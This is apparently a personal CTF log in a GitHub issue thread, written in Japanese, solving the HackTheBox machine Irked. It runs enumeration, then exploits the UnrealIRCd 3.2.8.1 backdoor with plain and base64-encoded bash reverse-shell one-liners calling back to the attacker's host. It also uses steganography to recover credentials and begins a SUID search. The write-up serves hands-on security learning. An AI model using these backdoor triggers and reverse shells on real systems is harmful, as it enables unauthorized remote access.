search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Irked (Machine Easy) #43

Open roaris opened 1 month ago

roaris commented 1 month ago

https://app.hackthebox.com/machines/Irked

$ nmap -sC -sV -Pn 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:14 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36100/tcp   status
|   100024  1          43306/udp6  status
|   100024  1          44305/udp   status
|_  100024  1          53681/tcp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.00 seconds
roaris commented 1 month ago

image

https://developer.mozilla.org/ja/docs/Glossary/IRC

IRC (Internet Relay Chat) は、インターネット接続と IRC サーバーを介してメッセージを送受信する IRC クライアントを必要とする世界的なチャットシステムです。

聞いたことない 111番ポートが空いてるのと関係ある?

Apache 2.4.10の脆弱性を調べたが、使えそうなのはなかった

roaris commented 1 month ago

/manual/にアクセスすると、meta refreshで/manual/en/index.htmlにリダイレクトして、Apacheのマニュアルが出てくる

$ gobuster dir --url http://10.10.10.117 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.117
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/icons/               (Status: 403) [Size: 293]
/manual/              (Status: 200) [Size: 626]
Progress: 44679 / 87665 (50.97%)[ERROR] Get "http://10.10.10.117/097524020X/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/bugreports/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000689/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000649/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000331/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 51580 / 87665 (58.84%)[ERROR] Get "http://10.10.10.117/36283/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35445/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36281/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35949/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36657/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/31339/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5251/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5777/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35456/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/32115/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
roaris commented 1 month ago

検索期間をマシン公開日(2018/11/17)より前にして、rpcbind exploitで調べたけど全く分からない

検索期間絞るのやめると、111番ポートが使われている別のマシンのwriteupが出てきた https://sanposhiho.com/posts/2020-09-06-qiita-fbb2689111821d99de85/

真似してコマンド打つ

$ nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:58 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds

何も出てこなかった

roaris commented 1 month ago

https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind

Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.

$ rpcinfo 10.10.10.117
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    3    tcp6      ::.0.111               portmapper superuser
    100000    4    udp6      ::.0.111               portmapper superuser
    100000    3    udp6      ::.0.111               portmapper superuser
    100000    4    tcp       0.0.0.0.0.111          portmapper superuser
    100000    3    tcp       0.0.0.0.0.111          portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    udp       0.0.0.0.0.111          portmapper superuser
    100000    3    udp       0.0.0.0.0.111          portmapper superuser
    100000    2    udp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100000    3    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.173.17         status     107
    100024    1    tcp       0.0.0.0.141.4          status     107
    100024    1    udp6      ::.169.42              status     107
    100024    1    tcp6      ::.209.177             status     107

addressのところはIPv6になっているのか どう見たらよいのかさっぱり分からない

roaris commented 1 month ago

詰んだので、https://www.tagnull.de/post/irked/ を見た(Guided Modeはなかった) 全ポートをスキャンするらしい

$ nmap -p- 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:16 JST

全然終わらない 仕方ないので、空いているのは6697番ポートらしいので、空いていることを確認だけして、進める

$ nmap -p 6697 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:18 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT     STATE SERVICE
6697/tcp open  ircs-u

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
roaris commented 1 month ago

HexChatというIRCクライアントのツールを使うらしいが、Windowsしかインストール出来なさそうだった https://hexchat.github.io/downloads.html

なので、公式writeupを見る 公式writeupではポート8067を見つけている

$ nmap -p 8067 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:36 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).

PORT     STATE SERVICE
8067/tcp open  infi-async

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds

ポート8067に対して、irssiというコマンドを実行する 無かったので、インストール

$ sudo apt install irssi
$ man irssi
Irssi(1)                                       General Commands Manual                                       Irssi(1)

NAME
       Irssi - a modular IRC client for UNIX

SYNOPSIS
       irssi [--config=PATH] [--home=PATH] [-dv!?] [-c server] [-p port] [-n nickname] [-w password] [-h hostname]

DESCRIPTION
       Irssi  is  a  modular Internet Relay Chat client; it is highly extensible and very secure. Being a fullscreen,
       termcap based client with many features, Irssi is easily extensible through scripts and modules.
...

これもIRCクライアントらしい

roaris commented 1 month ago

irssi -c 10.10.10.117 -p 8067を打つと、ターミナルが占領される exitと打つと元に戻るらしいが、戻らなかった

 Irssi v1.4.5 - https://irssi.org                                                                                       22:43 -!- Irssi: Looking up 10.10.10.117
22:43 -!- Irssi: The following settings were initialized
22:43                        real_name
22:43 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 8067
22:43 Waiting for CAP LS response...
22:43 -!- Irssi: Connection to 10.10.10.117 established
22:43 !irked.htb *** Looking up your hostname...
22:44 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
22:44 -!- Welcome to the ROXnet IRC Network roaris!roaris@10.10.14.50
22:44 -!- Your host is irked.htb, running version Unreal3.2.8.1
22:44 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
22:44 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
22:44 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32
          TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
22:44 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
          CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
          STATUSMSG=~&@%+ are supported by this server
22:44 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
22:44 -!- There are 1 users and 0 invisible on 1 servers
22:44 -!- 1 unknown connection(s)
22:44 -!- I have 1 clients and 0 servers
22:44 -!- Current Local Users: 1  Max: 1
22:44 -!- Current Global Users: 1  Max: 1
22:44 -!- MOTD File is missing
22:44 -!- Mode change [+iwx] for user roaris
22:44 -!- You may not reregister

 [22:45] [roaris(+iwx)] [1:10 (change with ^X)]

この出力の中のUnreal3.2.8.1に着目するらしい UnrealIRCdというIRCデーモンがあるらしい ちなみに、irssi -c 10.10.10.117 -p 6697でも、Unreal3.2.8.1を見つけられた

roaris commented 1 month ago

Unreal 3.2.8.1にはバックドアが存在している CVE-2010-2075 AB;の後に、コマンドを続けると、それが実行されるらしい

これまでは、いきなりリバースシェルを取っていたけど、まずは疎通確認からする

$ echo "AB; ping 10.10.14.50" | nc 10.10.10.117 8067
$ sudo tcpdump -i tun0 icmp                                                                                                                                                  
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:04:09.291342 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 70, length 64
23:04:09.291363 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 70, length 64
23:04:10.290579 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 71, length 64
23:04:10.290588 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 71, length 64
23:04:11.291308 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 72, length 64
23:04:11.291330 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 72, length 64
roaris commented 1 month ago

疎通確認したのに、リバースシェルが実行できない ポート6697も駄目

$ echo "AB; bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | nc 10.10.10.117 8067

公式writeupでは、フィルターをバイパスするために、base64エンコードして、ポート65534を対象にしているが、それも駄目だった

$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 65534
roaris commented 1 month ago

マシンを再起動したらいけた base64エンコードをしないと上手くいかなかった

$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 8067
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.117: inverse host lookup failed: Unknown host
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.117] 45491
bash: cannot set terminal process group (613): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$
roaris commented 1 month ago

user.txtは見れず

ircd@irked:~/Unreal3.2$ ls -al /home
ls -al /home
total 16
drwxr-xr-x  4 root     root     4096 Sep  5  2022 .
drwxr-xr-x 21 root     root     4096 Sep  8  2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 djmardov
drwxr-xr-x  3 ircd     root     4096 Sep  5  2022 ircd
ircd@irked:~/Unreal3.2$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x  3 ircd root 4096 Sep  5  2022 .
drwxr-xr-x  4 root root 4096 Sep  5  2022 ..
lrwxrwxrwx  1 root root    9 Sep  5  2022 .bash_history -> /dev/null
-rw-r--r--  1 ircd ircd    0 May 14  2018 .bashrc
-rw-r--r--  1 ircd ircd   66 May 14  2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~/Unreal3.2$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x  4 root     root     4096 Sep  5  2022 ..
lrwxrwxrwx  1 root     root        9 Nov  3  2018 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep  5  2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep  5  2022 .config
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Documents
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Downloads
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .gconf
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3  2018 .ICEauthority
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .local
drwx------  4 djmardov djmardov 4096 Sep  5  2022 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Music
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Public
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Templates
-rw-r-----  1 root     djmardov   33 May 25 10:21 user.txt
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Videos
ircd@irked:~/Unreal3.2$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied
roaris commented 1 month ago

以下を試したが手掛かりを得られなかった

ircd@irked:~$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x  3 ircd root 4096 Sep  5  2022 .
drwxr-xr-x  4 root root 4096 Sep  5  2022 ..
lrwxrwxrwx  1 root root    9 Sep  5  2022 .bash_history -> /dev/null
-rw-r--r--  1 ircd ircd    0 May 14  2018 .bashrc
-rw-r--r--  1 ircd ircd   66 May 14  2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x  4 root     root     4096 Sep  5  2022 ..
lrwxrwxrwx  1 root     root        9 Nov  3  2018 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep  5  2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep  5  2022 .config
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Documents
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Downloads
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .gconf
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3  2018 .ICEauthority
drwx------  3 djmardov djmardov 4096 Sep  5  2022 .local
drwx------  4 djmardov djmardov 4096 Sep  5  2022 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Music
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Public
drwx------  2 djmardov djmardov 4096 Sep  5  2022 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Templates
-rw-r-----  1 root     djmardov   33 May 25 10:21 user.txt
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 Videos
ircd@irked:~$ ls -al /var/www
ls -al /var/www
total 24
drwxr-xr-x  3 root root  4096 May 14  2018 .
drwxr-xr-x 13 root root  4096 May 11  2018 ..
drwxr-xr-x  2 root root  4096 May 15  2018 html
-rw-r--r--  1 root root 10701 May 11  2018 index.old
ircd@irked:~$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~$ uname -rs
uname -rs
Linux 3.16.0-6-686-pae
roaris commented 1 month ago

/home/djmardov/Documentsを見るらしい

ircd@irked:/home/djmardov$ ls -al Documents
ls -al Documents
total 12
drwxr-xr-x  2 djmardov djmardov 4096 Sep  5  2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep  5  2022 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
lrwxrwxrwx  1 root     root       23 Sep  5  2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov$ cat Documents/.backup
cat Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

まあこれ見ても何したら良いのか分からないけど

roaris commented 1 month ago

stegはsteganographyのことらしい 画像の中に情報を隠すやつ

ポート80番の画像を使うようだ steghideコマンドで情報を隠したり、隠した情報を取りだすことが出来る pass.txtに情報が書き出された

$ wget http://10.10.10.117/irked.jpg
$ sudo apt install steghide
$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG
roaris commented 1 month ago

djmardov / Kab6h+m+bbp2J:HG でsshログイン user.txtゲット

$ ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cat user.txt
2c03fedaeeaec3288ed5d8a962d3a044
roaris commented 1 month ago

公式writeupでは、setuidが設定されたファイルを探している

djmardov@irked:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount

On listing the suid files a file /usr/bin/viewuser is noticed which isn’t present on Debian by default.

とあるけど、これだけ数あって、いきなり/usr/bin/viewuserに着目するというのは無理がある

https://sanposhiho.com/posts/2020-03-06-qiita-fe1f4b35cf74f09a6cb8/ ではlinuxprivcheckerというものを使っているので、試す

roaris commented 1 month ago

python2で動いた

djmardov@irked:~$ python3 linuxprivchecker.py > linuxprivchecker.txt
  File "linuxprivchecker.py", line 74
    print "[+] " + msg
               ^
SyntaxError: Missing parentheses in call to 'print'
djmardov@irked:~$ python2 linuxprivchecker.py > linuxprivchecker.txt

出力の数が多すぎる その中に、setuidとsetgidが設定されたファイル/ディレクトリの一覧がある(ディレクトリにsetuid, setgidを設定するってどういうこと?)

[+] SUID/SGID Files and Directories
    -rwxr-sr-x 1 root mail 13680 Dec 24  2016 /usr/lib/evolution/camel-lock-helper-1.2
    -rwxr-sr-x 1 root utmp 13992 Jun 23  2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
    -rwxr-sr-x 1 root utmp 13992 Dec  5  2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
    -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
    -rwsr-xr-- 1 root messagebus 362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
    -rwsr-xr-x 1 root root 562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
    drwxrwsr-t 2 root lpadmin 4096 Sep  5  2022 /usr/share/ppd/custom
    -rwsr-xr-x 1 root root 1085300 Feb 10  2018 /usr/sbin/exim4
    -rwsr-xr-- 1 root dip 338948 Apr 14  2015 /usr/sbin/pppd
    -rwxr-sr-x 1 root tty 26240 Mar 29  2015 /usr/bin/wall
    -rwxr-sr-x 1 root mail 17880 Nov 18  2017 /usr/bin/lockfile
    -rwsr-xr-x 1 root root 43576 May 17  2017 /usr/bin/chsh
    -rwsr-sr-x 1 root mail 96192 Nov 18  2017 /usr/bin/procmail
    -rwsr-xr-x 1 root root 78072 May 17  2017 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 38740 May 17  2017 /usr/bin/newgrp
    -rwsr-sr-x 1 daemon daemon 50644 Sep 30  2014 /usr/bin/at
    -rwxr-sr-x 1 root shadow 21964 May 17  2017 /usr/bin/expiry
    -rwxr-sr-x 1 root tty 9680 Oct 17  2014 /usr/bin/bsd-write
    -rwxr-sr-x 1 root mail 9772 Dec  4  2014 /usr/bin/mutt_dotlock
    -rwxr-sr-x 1 root ssh 419192 Nov 19  2017 /usr/bin/ssh-agent
    -rwsr-xr-x 1 root root 18072 Sep  8  2016 /usr/bin/pkexec
    -rwxr-sr-x 1 root mail 13892 Jun  2  2013 /usr/bin/dotlockfile
    -rwxr-sr-x 1 root crontab 38844 Jun  7  2015 /usr/bin/crontab
    -rwsr-sr-x 1 root root 9468 Apr  1  2014 /usr/bin/X
    -rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd
    -rwxr-sr-x 1 root mlocate 32116 Jun 13  2013 /usr/bin/mlocate
    -rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn
    -rwxr-sr-x 1 root shadow 61232 May 17  2017 /usr/bin/chage
    -rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser
    drwxrwsr-x 10 root staff 4096 Sep  5  2022 /usr/local
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/include
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/etc
    drwxrwsr-x 4 root staff 4096 Sep  5  2022 /usr/local/lib
    drwxrwsr-x 4 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7/site-packages
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python2.7/dist-packages
    drwxrwsr-x 3 root staff 4096 Sep  5  2022 /usr/local/lib/python3.4
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/lib/python3.4/dist-packages
    drwxrwsr-x 8 root staff 4096 Sep  5  2022 /usr/local/share
    drwxrwsr-x 6 root staff 4096 Sep  5  2022 /usr/local/share/xml
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/declaration
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/entities
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/schema
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/xml/misc
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/man
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/ca-certificates
    drwxrwsr-x 3 root staff 4096 Sep  5  2022 /usr/local/share/emacs
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/emacs/site-lisp
    drwxrwsr-x 7 root staff 4096 Sep  5  2022 /usr/local/share/sgml
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/declaration
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/entities
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/stylesheet
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/misc
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/sgml/dtd
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/share/fonts
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/sbin
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/bin
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/games
    drwxrwsr-x 2 root staff 4096 Sep  5  2022 /usr/local/src
    drwxr-s--- 2 root dip 4096 May 11  2018 /etc/chatscripts
    drwxr-s--- 2 root dip 4096 May 11  2018 /etc/ppp/peers
    drwxr-sr-x 29 man root 4096 May 25 10:31 /var/cache/man
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hu
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ko
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/de
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/gl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ro
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sk
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fi
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/id
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_CN
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/cs
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ja
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/tr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt_BR
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hr
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/es
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sv
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/it
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/nl
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ru
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_TW
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/el
    drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/da
    drwxrwsr-x 2 root mail 4096 May 11  2018 /var/mail
    drwxr-s--- 2 Debian-exim adm 4096 May 25 10:26 /var/log/exim4
    drwxrwsr-x 2 root staff 4096 Jan  9  2017 /var/local
    -rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs
